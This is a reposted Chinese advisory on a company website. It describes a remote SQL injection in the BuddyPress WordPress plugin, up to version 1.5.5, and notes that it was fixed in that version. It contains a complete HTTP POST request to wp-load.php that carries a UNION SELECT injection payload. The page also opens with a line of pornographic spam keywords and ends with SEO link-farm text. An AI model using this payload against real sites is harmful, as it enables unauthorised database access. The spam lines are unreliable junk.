欧美激情网,国产欧美亚洲高清,欧美屁股xxxxx,欧美群妇大交群,欧美人与物ⅴideos另类,区二区三区在线 | 欧洲

<var id="6ewyo"></var>

QQ 咨詢：361652718 513960520

知識學堂

·聯(lián)系電話:+86.023-75585550
·聯(lián)系傳真:+86.023-75585550
·24小時手機:13896886023
·QQ 咨詢：361652718 513960520

當前位置 > 首頁 > 知識學堂 > 網(wǎng)站建設(shè)知識

Wordpress插件Buddypress遠程SQL注射及修復

更新時間：2012-04-03 | 發(fā)布人：本站 | 點擊率：310 次

標題: Buddypress plugin of Wordpress remote SQL Injection

作者: Ivan Terkin

類型: Remote Exploit

漏洞: Remote SQL Injection

軟件下載地址: buddypress.org

影響版本: 1.5.5及以下

測試平臺: Buddypress 1.5.4

POST /wp-load.php HTTP/1.1

User-Agent: Mozilla

Host: www.xxxx.com

Accept: */*

Referer: http://www.badguest.cn /activity/?s=b

Connection: Keep-Alive

Content-Length: 153

Content-Type: application/x-www-form-urlencoded

action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+

修復方案：

已經(jīng)報告給官方并且在 1.5.5版進行了修復

分享到：

QQ空間

新浪微博

開心網(wǎng)

人人網(wǎng)

下一篇：用簡單的工具從防火墻追蹤惡意軟件
上一篇：無盤PNP standard pc 無法軟關(guān)機的解決辦法。

相關(guān)文章

網(wǎng)盾科技
正和文印
酉陽新三星
酉陽力得電器
點訊網(wǎng)
善配資訊網(wǎng)
谷歌搜索
百度收錄
名站在線
百度搜索
114名站導航網(wǎng)

歡迎PR>=3的同行網(wǎng)站與我們交換友情鏈接：

點擊這里給我發(fā)消息

Copyright 2011 - 2015 m.washop.cn All Rights Reserved
重慶指間世界科技有限公司版權(quán)所有電話：023-75585550,13098706767,13896886023
地址：重慶市酉陽縣桃花源南路241號
渝ICP備19008661號

渝公網(wǎng)安備 50024202000196號

<big id="eb8md"></big>